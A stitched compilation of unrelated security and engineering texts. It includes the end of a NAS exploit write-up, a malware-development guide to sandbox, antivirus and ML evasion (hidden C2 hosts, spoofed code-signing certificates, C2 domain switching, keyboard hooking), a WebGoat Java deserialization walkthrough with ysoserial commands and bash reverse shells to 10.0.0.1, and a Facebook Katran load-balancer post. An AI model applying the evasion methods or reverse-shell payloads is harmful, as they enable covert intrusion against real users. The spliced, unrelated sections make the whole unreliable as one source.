uid=0(root) gid=0(root)

Yay! Our pwned.txt has been created and the exploit was successful. We have a video demo showing the full exploit chain from XXE to SSRF to RCE being used to create a reverse root shell. We will post the video and the exploit code soon.
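The chain depended on an HTTP client that followed a redirect to a loopback address without question. One common mitigation is to check every URL, including each redirect target, before fetching it. Below is a minimal sketch of such a check in Python; the function name is made up, and a real guard would also resolve host names and check the resulting addresses, which this example deliberately leaves out.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(url: str) -> bool:
    """Return True if the URL points at a loopback, private or link-local address."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # unparsable: treat as unsafe
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A host name rather than an IP literal. Resolution is out of scope here.
        return False
    return address.is_loopback or address.is_private or address.is_link_local


# The redirect target used in the chain would be refused by this check.
print(is_internal_target("http://127.0.0.1:2000/a.php?d=payload"))
print(is_internal_target("http://SolarSystem:9091/redir.php?red=1"))
```

Applying the check to every hop matters here, because the first URL in the chain was external and only the redirect pointed back at the device.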

Timeline

This research led us to look into more NAS devices, such as WD MyBook, and to discover multiple critical root RCE vulnerabilities that ultimately impacted millions of devices in Western countries. That research was published on the WizCase blog. Unfortunately, Axentra, the vendors of the affected devices, and even WD chose silence. Some have responded saying there will NOT BE any patches for the vulnerabilities affecting millions!

This is where, in the near future, the enforcement of laws like the California Consumer Privacy Act can come into play by holding manufacturers responsible for their actions, in this case at least regarding patching!

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to find time to write the final part of the series on Malware Development. But lately I have been receiving many DMs on Twitter asking me to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organizations. One is the network level, where it tries to identify anomalies based on the behavior of network connections, proxy logs and patterns of connections over time. Most network ML solutions analyze malware beacons and use DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics) or FireEye sandboxes do. On the other hand, we have endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools, which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s mostly a matter of trial and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start, let’s try to get a basic understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in the case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get detected easily due to Microsoft’s AMSI (Anti-Malware Scan Interface), which continuously checks running code (mainly PowerShell, among others) to detect malicious process executions and connections. For those of you who don’t know, Microsoft uses the DMTK (Microsoft Distributed Machine Learning Toolkit) framework, which is basically a decision-tree-based algorithm that decides whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft, and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over the network, so that I could have the flexibility at a lower level to do whatever I want. We will be using a lot of Windows APIs, encrypted variables and a lot of decision trees of our own to evade ML. This is supposed to work until Microsoft starts using the CNTK framework, which is a much better framework than DMTK but also harder to apply.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know beforehand which process we are going to execute. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a script in Python which can fetch and create duplicate certificates from any website, which we can use for code signing. One thing I noticed is that antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason is that not every antivirus in every organization can connect to the internet to fetch and verify the certificates for every third-party application installed. You can find the certificate spoofing Python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found to date, and it works almost every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the victim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of a malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and products: MAC unique identifier(s)
VMware ESX 3, Server, Workstation, Player: 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC: 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo: 00-1C-42
Virtual Iron 4: 00-0F-4B
Red Hat Xen: 00-16-3E
Oracle VM: 00-16-3E
XenSource: 00-16-3E
Novell Xen: 00-16-3E
Sun xVM VirtualBox: 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed

WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are many more ways to evade ML and AV detection, and they aren’t really that hard. Evading ML-based AVs is not rocket science, as people say. It just requires some free time to sit down, understand how the underlying architecture works and find the flaws in it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in its own way.

 

Java Deserialization — From Discovery to Reverse Shell on Limited Environments

( Original text by Ahmed Sherif & Francesco Soncina )

In this article, we are going to show you our journey of exploiting the Insecure Deserialization vulnerability, and we will take the WebGoat 8 deserialization challenge (deployed on Docker) as an example. The challenge can be solved by just executing sleep for 5 seconds. However, we are going to move further for fun and try to get a reverse shell.


Introduction

The Java deserialization issue has been known in the security community for a few years. In 2015, two security researchers, Chris Frohoff and Gabriel Lawrence, gave a talk called Marshalling Pickles at AppSecCali. Additionally, they released their payload generator tool called ysoserial.

Object serialization mainly allows developers to convert in-memory objects to binary and textual data formats for storage or transfer. However, deserializing objects from untrusted data can cause an attacker to achieve remote code execution.


Discovery

As mentioned in the challenge, the vulnerable page takes a serialized Java object in Base64 format from the user input and it blindly deserializes it. We will exploit this vulnerability by providing a serialized object that triggers a Property Oriented Programming Chain (POP Chain) to achieve Remote Command Execution during the deserialization.

The WebGoat 8 Insecure Deserialization challenge

We start by firing up Burp and installing a plugin called Java-Deserialization-Scanner. The plugin consists of 2 features: one is for scanning and the other is for generating the exploit based on the ysoserial tool.

Java Deserialization Scanner Plugin for Burp Suite

After scanning the remote endpoint the Burp plugin will report:

Hibernate 5 (Sleep): Potentially VULNERABLE!!!

Sounds great!


Exploitation

Let’s move to the next step and go to the exploitation tab to achieve arbitrary command execution.

Huh?! It seems there is an issue with ysoserial. Let’s dig deeper and move to the console to see what exactly the issue is.

Error in payload generation

By looking at ysoserial, we see that two different POP chains are available for Hibernate. By using those payloads we figure out that none of them is being executed on the target system.

Available payloads in ysoserial

How, then, did the plugin generate this payload to trigger the sleep command?

We decided to look at the source code of the plugin on the following link:

We noticed that the payload is hard-coded in the plugin’s source code, so we need to find a way to generate the same payload in order to get it working.

The payload is hard-coded.

Based on some research and help, we figured out that we need to modify the current version of ysoserial in order to get our payloads working.

We downloaded the source code of ysoserial and decided to recompile it using Hibernate 5. In order to successfully build ysoserial with Hibernate 5 we need to add the javax.el package to the pom.xml file.

We also have sent out a Pull Request to the original project in order to fix the build when the hibernate5 profile is selected.

Updated pom.xml

We can proceed to rebuild ysoserial with the following command:

mvn clean package -DskipTests -Dhibernate5

and then we can generate the payload with:

java -Dhibernate5 -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch /tmp/test" | base64 -w0

Working payload for Hibernate 5

We can verify that our command was executed by accessing the docker container with the following command:

docker exec -it <CONTAINER_ID> /bin/bash

As we can see our payload was successfully executed on the machine!

The exploit works!

We proceed to enumerate the binaries on the target machine.

webgoat@1d142ccc69ec:/$ which php
webgoat@1d142ccc69ec:/$ which python
webgoat@1d142ccc69ec:/$ which python3
webgoat@1d142ccc69ec:/$ which wget
webgoat@1d142ccc69ec:/$ which curl
webgoat@1d142ccc69ec:/$ which nc
webgoat@1d142ccc69ec:/$ which perl
/usr/bin/perl
webgoat@1d142ccc69ec:/$ which bash
/bin/bash
webgoat@1d142ccc69ec:/$

Only Perl and Bash are available. Let’s try to craft a payload to send us a reverse shell.

We looked at some one-liners reverse shells on Pentest Monkeys:

And decided to try the Bash reverse shell:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

However, as you might know, java.lang.Runtime.exec() has some limitations. It does not run the command through a shell, so shell operators such as redirection or piping are not supported.

We decided to move forward with another option, which is a reverse shell written in Java. We are going to modify the source code on the Gadgets.java to generate a reverse shell payload.

The following path is the one which we need to modify:

/root/ysoserial/src/main/java/ysoserial/payloads/util/Gadgets.java from line 116 to 118.

The following Java reverse shell is listed on Pentest Monkeys, but it still didn’t work for us as is:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

After playing around with the code, we ended up with the following:

String cmd = "java.lang.Runtime.getRuntime().exec(new String []{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"}).waitFor();";
clazz.makeClassInitializer().insertAfter(cmd);

Let’s rebuild ysoserial again and test the generated payload.

Generating the weaponized payload with a Bash reverse shell

And.. we got a reverse shell back!

Great!


Generalizing the payload generation process

During our research we also found this encoder, which does the job for us: http://jackson.thuraisamy.me/runtime-exec-payloads.html

By providing the following Bash reverse shell:

bash -i >& /dev/tcp/[IP address]/[port] 0>&1

the generated payload will be:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}

Awesome! This encoder can also be useful for bypassing WAFs! 🚀



Special thanks to Federico Dotta and Mahmoud ElMorabea!

Open-sourcing Katran, a scalable network load balancer (Facebook libs)

With billions of people around the globe using Facebook services, our infrastructure engineers have created a range of systems to optimize traffic and to enable fast, reliable access for everyone. Today, we are open-sourcing a component of this work by releasing the Katran forwarding plane software library, which powers the network load balancer used in Facebook’s infrastructure. Katran offers a software-based solution to load balancing with a completely reengineered forwarding plane that takes advantage of two recent innovations in kernel engineering: eXpress Data Path (XDP) and the eBPF virtual machine. Katran is deployed today on backend servers in Facebook’s points of presence (PoPs), and it has helped us improve the performance and scalability of network load balancing and reduce inefficiencies such as busy loops when there are no incoming packets. By sharing it with the open source community, we hope others can improve the performance of their load balancers and also use Katran as a foundation for future work.

The challenge of serving requests at Facebook scale

To manage traffic at Facebook scale, we have deployed a globally distributed network of points of presence to act as proxies for our data centers. Given the extremely high volume of requests, both PoPs and data centers confront the challenge of making the large fleet of (backend) servers appear as a single virtual unit to the outside world and also distributing the workload efficiently among those backend servers.

These challenges are typically addressed by announcing a virtual IP address (VIP) to the internet at each location. Packets destined to the VIP are then seamlessly distributed among the backend servers. The distribution algorithm, however, needs to account for the fact that the backend servers typically operate at an application layer and terminate the TCP connections. This responsibility is handled by a network load balancer (often called a layer 4 load balancer, or an L4LB, because it operates on packets rather than serving application level requests). Figure 1 illustrates the role of an L4LB in relation to the other network components.

Figure 1: A network load balancer fronts several backend servers running a backend application and consistently sends all packets from each client connection to a unique backend server.

Requirements for a high-performance load balancer

An L4LB’s performance is especially important for managing latency and scaling the number of backend servers, because the L4LBs are on a path that needs to process every incoming packet. Performance is typically measured as peak packets per second (pps) that the L4LB can process. Traditionally, engineers have preferred hardware-based solutions for this task because they typically use accelerators such as application-specific integrated circuits (ASICs) or field-programmable gate arrays (FPGAs) to reduce the burden on the main CPU. However, one of the drawbacks of a hardware-centric approach is that it limits the system’s flexibility. To effectively serve Facebook’s needs, a network load balancer must:

  • Run on commodity Linux servers. This allows us to run the load balancer on part or all of the large fleet of currently deployed servers. A software-based load balancer satisfies this criterion.
  • Coexist with other services on a given server. This removes the need for dedicated servers that run the load balancer exclusively, thereby increasing fault tolerance.
  • Allow low-disruption maintenance. Facebook’s software must be able to evolve quickly in order to support new or improved products and services. Maintenance and upgrades are a norm, not exceptions, for the load balancer and backend layers. Minimizing disruption during these events allows us to iterate faster.
  • Offer easy instrumentation and debugging. All large distributed infrastructures must contend with anomalies and unexpected events, so reducing the time to debug and troubleshoot issues is important. The load balancer needs to be instrumentable and friendly to standard tools like tcpdump.

In order to solve for these requirements, we designed a high-performance software network load balancer. The first generation of our L4LB was based on the IPVS kernel module and served Facebook’s needs for well over four years. However, it fell short on the goal of coexistence with other services, specifically the backends. In the second iteration, we leveraged the eXpress Data Path (XDP) framework and the new BPF virtual machine (eBPF) to run the software load balancer together with the backends on a large number of machines. Figure 2 shows the key difference between the two generations.

Figure 2: Differences between the two generations of L4LBs. Note that both are software load balancers running on backend servers. Katran (right) allows us to colocate the load balancer with backend application, thus increasing the load balancer capacity.

Our First-generation L4LB: Building on OSS Software

With our first-generation L4LB, we leaned heavily on existing open source components to implement most of the functionality. This approach helped us replace a hardware-based solution across a large deployment in only a few months. The design has four major components:

  • VIP announcement: This component simply announces the virtual IP addresses that the L4LB is responsible for to the world by peering with the network element (typically a switch) in front of the L4LB. The switch then uses an equal-cost multipath (ECMP) mechanism to distribute packets among the L4LBs announcing the VIP. We used ExaBGP for the VIP announcement because of its lightweight, flexible design.
  • Backend server selection: In order to send all packets from a client to the same backend, the L4LBs use a consistent hash that depends on the 5-tuple (source address, source port, destination address, destination port, and protocol) of the incoming packet. The use of a consistent hash ensures that all packets that belong to a transport connection are sent to the same backend irrespective of the L4LB receiving the packet. This removes the need for any state synchronization across multiple L4LBs. The consistent hash also guarantees minimal disruption to existing connections when a backend leaves or joins the pool of backends.
  • Forwarding plane: Once the L4LB picks the appropriate backend, the packets need to be forwarded to that host. To avoid restrictions such as keeping L4LB and backend hosts on the same L2 domain, we use a simple IP-in-IP encapsulation. This allows us to place L4LB and backend hosts in different racks. We used the IPVS kernel module for the encapsulation. The backends are configured to have the corresponding VIP on their loopback interface. This allows the backend to send packets on the return path directly to the client (instead of the L4LB). This optimization, often called direct server return (DSR), allows the L4LB to be constrained only by the incoming packet volume.
  • Control plane: This component performs various functions, including performing health checks on the backend servers, providing a simple interface (via a configuration file) to add or remove VIPs, and providing simple APIs to examine the state of the L4LB and backend servers. We developed this component in-house.
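
The backend server selection described above can be sketched in a few lines. This is a minimal illustration, not the code we ran: the text does not say which consistent hash the first-generation L4LB used, so rendezvous (highest-random-weight) hashing is swapped in here, and the backend addresses, flows and function names are all made up for the example. It shows the two properties the design relies on: independent L4LBs agree on a backend without sharing state, and removing a backend only remaps the flows that were on it.

```python
import hashlib

def flow_key(src_ip, src_port, dst_ip, dst_port, proto):
    """Serialize the 5-tuple into a stable byte string."""
    return f"{src_ip}|{src_port}|{dst_ip}|{dst_port}|{proto}".encode()

def pick_backend(five_tuple, backends):
    """Rendezvous hashing: score every backend against the flow, keep the best."""
    key = flow_key(*five_tuple)

    def score(backend):
        digest = hashlib.sha256(key + b"#" + backend.encode()).digest()
        return int.from_bytes(digest[:8], "big")

    return max(backends, key=score)

# Hypothetical pool and client flows (documentation address ranges).
backends = ["10.0.1.1", "10.0.1.2", "10.0.1.3", "10.0.1.4"]
flows = [("198.51.100.7", 40000 + i, "203.0.113.10", 443, "tcp") for i in range(1000)]

# Two L4LBs hold the same pool (in a different order) and share no state.
lb_a = [pick_backend(f, backends) for f in flows]
lb_b = [pick_backend(f, list(reversed(backends))) for f in flows]
same_choice = lb_a == lb_b

# Removing one backend only moves the flows that were assigned to it.
remaining = [b for b in backends if b != "10.0.1.3"]
after = [pick_backend(f, remaining) for f in flows]
moved = sum(1 for before, now in zip(lb_a, after) if before != now)
on_removed = lb_a.count("10.0.1.3")
print(same_choice, moved == on_removed)
```

Because the choice depends only on the packet's 5-tuple and the pool membership, whichever L4LB the ECMP switch picks will forward the packet to the same backend.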

Each L4LB also stores the backend choice for each 5-tuple as a lookup table to avoid duplicate computation of the hash on future packets. This state is a pure optimization and is not necessary for correctness. This design met several requirements of Facebook’s workload listed above, but there was one major drawback: Colocating the L4LB and a backend on a single host increased the chance of device failure. Even with the local state, the L4LB was a CPU-intensive component. To separate the failure domains, we ran the L4LBs and backend servers on disjoint sets of machines. There were fewer L4LBs than backend servers in this setup, which made the L4LBs more vulnerable to a sudden increase in load. The fact that packets had to traverse the regular Linux network stack before being handled by the L4LB exacerbated the problem.

Figure 3: Overview of our first-generation L4LB. Note that the load balancer and the backend application run on different machines. Different load balancers make consistent decisions without any state synchronization. Using packet encapsulation allows the servers running the load balancer and the backend application to be placed in different racks. In a typical deployment, the ratio of the number of L4LBs to the number of backend application servers is very small.

Katran: Reimagining the forwarding plane

Katran, our second-generation L4LB, significantly improves upon the previous version with a completely reengineered forwarding plane. Two recent developments in the kernel world powered the new design:

  • The XDP provides a fast, programmable network data path without resorting to a full-fledged kernel bypass method and works in conjunction with the Linux networking stack. (A detailed overview of XDP is available here.)
  • The eBPF virtual machine provides a flexible, efficient, and more reliable way to interact with the Linux kernel and to extend its functionality by running user-space supplied programs at specific points in the kernel. eBPF has already brought dramatic improvements to several areas, including tracing and filtering. (More details are available here.)

The overall architecture of the system is similar to that of the first-generation L4LB: First, ExaBGP announces to the world which VIPs a particular Katran instance is responsible for. Second, packets destined to a VIP are sent to Katran instances using an ECMP mechanism. Finally, Katran selects a backend and forwards the packet to the correct backend server. The main differences are in the last step.

Early and efficient packet handling: Katran uses XDP in combination with a BPF program for packet forwarding. When XDP is enabled in driver mode, a packet handling routine (BPF program) is run immediately after a packet is received by the network interface card (NIC) and before the kernel intercepts it. XDP invokes the BPF program on every incoming packet. If the NIC has multiple queues, the program is invoked in parallel for each one of them. The BPF program used for handling packets is lockless and uses a per-CPU version of BPF maps. Due to this parallelism, performance scales linearly with the number of the NIC’s RX queues. Katran also supports the “generic XDP” mode (instead of driver mode) of operation, at a performance cost.

Inexpensive and more stable hashing: Katran uses an extended version of the Maglev hash to select the backend server. A few features of the extended hash are resilience to backend server failures, more uniform distribution of load, and the ability to set unequal weights for different backend servers. The last of these is an important feature that allows us to handle hardware refreshes in our PoPs and data centers easily: We can absorb the newer generation hardware by simply setting appropriate weights. Despite its being more expressive, the code for computing this hash is small enough to fit entirely in the L1 cache.
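
To make the idea concrete, here is a rough sketch of a Maglev-style lookup table with per-backend weights. It is an illustration under assumptions, not Katran's code: the table population follows the published Maglev scheme, while the weighting (a backend claims `weight` slots per round) is one plausible extension that we assume for the example. The backend names, the table size of 251 and the helper names are hypothetical.

```python
import hashlib

def _h(name, salt):
    """64-bit hash of a string; the salt yields independent hash functions."""
    digest = hashlib.sha256(f"{salt}:{name}".encode()).digest()
    return int.from_bytes(digest[:8], "big")

def build_table(weights, size=251):
    """Populate a Maglev-style lookup table.

    `weights` maps backend name -> positive integer weight.
    `size` must be prime so every backend's preference list covers all slots.
    """
    names = sorted(weights)
    offset = {n: _h(n, "offset") % size for n in names}
    skip = {n: _h(n, "skip") % (size - 1) + 1 for n in names}
    next_idx = {n: 0 for n in names}
    table = [None] * size
    filled = 0
    while True:
        for n in names:
            for _ in range(weights[n]):  # heavier backends claim more slots per round
                # Walk this backend's preference list to its next free slot.
                slot = (offset[n] + next_idx[n] * skip[n]) % size
                while table[slot] is not None:
                    next_idx[n] += 1
                    slot = (offset[n] + next_idx[n] * skip[n]) % size
                table[slot] = n
                next_idx[n] += 1
                filled += 1
                if filled == size:
                    return table

def lookup(table, five_tuple):
    """Per-packet work: one hash and one array index."""
    key = "|".join(map(str, five_tuple))
    return table[_h(key, "flow") % len(table)]

# A hardware refresh: the newer host gets twice the weight of the older ones.
table = build_table({"old-1": 1, "old-2": 1, "new-1": 2})
share = {name: table.count(name) for name in ("old-1", "old-2", "new-1")}
print(share)
print(lookup(table, ("198.51.100.7", 40001, "203.0.113.10", 443, "tcp")))
```

The table is built once when the pool changes; the per-packet path is only the `lookup` function, which is why the real hash computation can stay small.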

More resilient local state: Katran’s efficiency at handling packets and computing the hash results in an interesting interaction with the local state table. We observed that, quite often, computing the hash is computationally easier than looking up the local state table for the 5-tuple to backend server choice. This is more visible for cases where the local state table lookup traverses all the way to the shared last level cache. In order to take advantage of this phenomenon in a natural way, we implemented the lookup table as an LRU-evicting cache. The LRU cache size is configurable at startup time and acts as a tunable parameter to strike a balance between computation and lookup. We picked these values empirically to optimize for pps. In addition, Katran provides a runtime “compute only” switch to ignore the LRU cache altogether in the event of catastrophic memory pressure on the host.
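
A minimal sketch of this arrangement, assuming a plain modulo hash as a stand-in for the real backend selection: an LRU-evicting table sits in front of the hash, its capacity is fixed at construction, and a `compute_only` flag bypasses it entirely. The class and attribute names are invented for the example.

```python
from collections import OrderedDict
import hashlib

class FlowTable:
    """LRU cache of flow -> backend in front of a stateless hash."""

    def __init__(self, backends, capacity, compute_only=False):
        self.backends = list(backends)
        self.capacity = capacity          # tunable: lookup cost vs. recomputation
        self.compute_only = compute_only  # runtime switch: ignore the cache
        self.cache = OrderedDict()
        self.hits = 0

    def _hash_pick(self, flow):
        # Stand-in for the real hash: deterministic and needs no state.
        digest = hashlib.sha256(repr(flow).encode()).digest()
        return self.backends[int.from_bytes(digest[:8], "big") % len(self.backends)]

    def backend_for(self, flow):
        if self.compute_only:
            return self._hash_pick(flow)
        if flow in self.cache:
            self.cache.move_to_end(flow)  # mark as most recently used
            self.hits += 1
            return self.cache[flow]
        choice = self._hash_pick(flow)
        self.cache[flow] = choice
        if len(self.cache) > self.capacity:
            self.cache.popitem(last=False)  # evict the least recently used flow
        return choice

table = FlowTable(["10.0.1.1", "10.0.1.2"], capacity=2)
a = ("198.51.100.7", 40001, "203.0.113.10", 443, "tcp")
b = ("198.51.100.7", 40002, "203.0.113.10", 443, "tcp")
c = ("198.51.100.7", 40003, "203.0.113.10", 443, "tcp")
for flow in (a, b, a, c):
    table.backend_for(flow)
print(list(table.cache) == [a, c], table.hits)
```

Since the cached value is always what the hash would return for the same pool, dropping an entry (or the whole cache) costs a recomputation but never changes the answer.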

RSS-friendly encapsulation: Receive Side Scaling (RSS) is an important optimization in NICs that aims to spread load across CPUs uniformly by steering packets from each flow to a separate CPU. Katran crafts its encapsulation to work in conjunction with RSS. Instead of using the same outer source for every IP-in-IP packet, packets in different flows (i.e., with different 5-tuples) are encapsulated using a different outer source IP, but packets in the same flow are always assigned the same outer source IP.
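
The sketch below shows one way such an encapsulation could look. It is an assumption-laden illustration rather than Katran's implementation: the outer source is taken from a hypothetical 172.16.0.0/16 range with the low 16 bits derived from a hash of the inner 5-tuple, and the outer header is a plain 20-byte IPv4 header with protocol number 4 (IP-in-IP).

```python
import hashlib
import ipaddress
import struct

# Hypothetical /16 reserved for outer source addresses.
OUTER_SRC_BASE = int(ipaddress.IPv4Address("172.16.0.0"))

def outer_source(five_tuple):
    """Same flow -> same outer source; different flows spread over the /16."""
    key = "|".join(map(str, five_tuple)).encode()
    low16 = int.from_bytes(hashlib.sha256(key).digest()[:2], "big")
    return ipaddress.IPv4Address(OUTER_SRC_BASE | low16)

def checksum(header):
    """Ones'-complement sum over 16-bit words, as used by the IPv4 header."""
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def encapsulate(inner_packet, five_tuple, backend_ip):
    """Prepend an outer IPv4 header that carries the inner packet as IP-in-IP."""
    src = outer_source(five_tuple)
    dst = ipaddress.IPv4Address(backend_ip)
    total_len = 20 + len(inner_packet)
    # version/IHL, TOS, total length, id, flags/fragment, TTL, protocol 4, checksum 0
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 4, 0,
                         src.packed, dst.packed)
    header = header[:10] + struct.pack("!H", checksum(header)) + header[12:]
    return header + inner_packet

flow = ("198.51.100.7", 40001, "203.0.113.10", 443, "tcp")
inner = b"\x45" + bytes(39)  # placeholder bytes standing in for the client's packet
packet = encapsulate(inner, flow, "10.0.1.1")
print(outer_source(flow), len(packet))
```

The receiving NIC hashes the outer header to choose a queue, so varying the outer source per flow lets RSS on the backend spread encapsulated traffic across CPUs while keeping each flow on one CPU.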

